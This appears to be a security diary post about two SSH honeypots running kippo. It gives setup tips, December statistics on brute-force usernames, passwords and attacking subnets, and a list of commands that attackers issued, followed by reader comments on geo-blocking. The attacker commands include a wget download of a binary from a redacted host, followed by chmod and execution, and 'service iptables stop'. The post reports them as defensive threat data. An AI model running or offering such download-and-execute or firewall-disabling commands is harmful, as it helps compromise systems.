Honey Pot Entertainment - SSH
The Christmas period is a nice time to play with some honeypots and share some of the info they have been collecting. Currently I only have two functioning, both of them are located in the US. Each receives 20K or more login attempts per day. I'm using a standard kippo installation, running as a non root user and using authbind to run the honeypot on port 22. Results are sent to a logging server for collection.
One of the honeypots has no valid password so it will always fail I'm mainly interested in collecting the various userid and passwords used in the guessing attempts. The other one does have a valid password and I regularly expand its interaction by providing the correct responses utilising the kippo capabilities. The password can be changed by modifying the data/userdb.txt file in the kippo subdirectory. The interaction can be improved by issuing a command and capturing the output and placing the resulting file in txtcmds directory. For example sftp is often the first command issued. Locate where sftp is running from (usually /usr/bin). Create the structure under the honeyfs directory, e.g. honeyfs/usr/bin/sftp. Issue the command sftp and capture the output to a file called sftp and place it in the txtcmds directory, follow the same structure so txtcmds/usr/bin/sftp. Now when the command is entered it will get a response and hopefully you will get additional results.
So some stats for December:
- Unique Passwords used: 136,029
- Unique Userids used: 305
- Unique Atatcking IP Addresses: 343
Most common guessed password | Most Common Userid | ||
---|---|---|---|
admin | 1528 | root | 612564 |
123456 | 671 | admin | 13615 |
12344321 | 438 | ubuntu | 127 |
default | 434 | oracle | 51 |
a1s2d3f4 | 433 | test | 41 |
root | 430 | ftpuser | 31 |
q1w2e3 | 426 | user | 29 |
qwer1234 | 422 | support | 28 |
111111 | 420 | ubnt | 26 |
1q2w3e4r5t | 417 | guest | 23 |
Locations
Dirtiest subnets
The following are the /24 subnets that are most active with a high number of hosts from the same subnet attacking.
- 103.41.124.0 - HK, CN - AS 63854
-
AS 4134 - https://isc.sans.edu/asreport.html?as=4134
- 122.225.109.0 - Huzhou, CN
- 122.225.97.0 - Huzhou, CN
- 122.225.103.0 - Huzhou, CN
- 218.2.0.0 - Nanjing, CN
- 222.186.34.0 - Nanjing, CN
- 61.174.50 - Huzhou, CN
- 61.175.51 - Huzhou, CN
Based on the above I'm quite comfortable in saying that blocking anything coming from AS4134 would not be a bad idea.
Passwords
The passwords used in the attempts are quite varied and range from the simple as shown above to much more esoteric and complex passwords such as !!QAZ@@WSX##EDC, !!Er.HAA22a098yIGH@_Z@, %TGBVFR$#EDCXSW@, WORLDEDU20121123.
Commands Issued
- ls -la /var/run/sftp.pid
-
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- wget http://---snip---/install/8004
- chmod +x 8004
- ./8004
- uname
- service iptables stop
There has been some increase in scanning over the past month or so. My previous Honeypot run in August 2014 would max out at 1500 attempts per day. The main surprise to me was the wide range of passwords being used. A number of them seem to relate directly to specific types of hardware installed such as modem/routers. Others look like quite robust passwords and may have come from the various password compromises this year. The main message is that if you are running an SSH server it will get attacked and you'd best have some decent passwords and ideally use certificate authentication to secure the server.
If you want to run your own, I'm a fan of kippo, it is simple to set up and there are plenty of guides on how to do it. Make sure you run it on a box that is not a production device and secure it. You do not want to become a staging point for attacks.
If you want to submit your kippo logs, Dr J in this diary https://isc.sans.edu/diary/New+Feature+Live+SSH+Brute+Force+Logs+and+New+Kippo+Client/18433 provides the perl to do so.
Enjoy
Mark H - Shearwater
Comments
Anonymous
Dec 28th 2014
9 years ago
On my private boxes, I have long moved to whitelist-only.. maintaining the blacklists has become too tiresome, with the high number of separate IP ranges that China (as worst offender) owns.
Anonymous
Dec 29th 2014
9 years ago
Anonymous
Dec 30th 2014
9 years ago
I am wondering why most Western ISPs that cater for the home and small business market don't just blacklist ALL IP blocks for North Korea, China, Russia, Middle East, etc. If customers really need access to these IP blocks - they could specifically request them ?
As a hopefully typical IT professional, 100% of my Web and Internet activity takes place within the UK/GB, USA, Canada, Australia
, New Zealand, France, Germany and Italy countries.
Surely, this would help to cut down the number of hacking/cracking/malicious attacks done against western users that appear to originate from these IP blocks ?
I realise that this wouldn't protect from western hosted botnets and trojaned PCs - but, it would be a useful starting point.
There may be good reasons why this isn't possible - but, if I had enough IT equipment to justify my own professional grade Cisco or equivalent type router and Firewall - then this is one of the first defence policies that I would enact.
Is this a worthwhile discussion point ?
Anonymous
Dec 31st 2014
9 years ago
Anonymous
Jan 1st 2015
9 years ago
Looking at it from a law enforcement perspective. If a PC in Nebraska is attacking your network, as a US citizen, you have a legal avenue to stop it. If the attack is coming from Brazil, Russia, or China, there is no way to realistically prosecute.
Anonymous
Jan 2nd 2015
9 years ago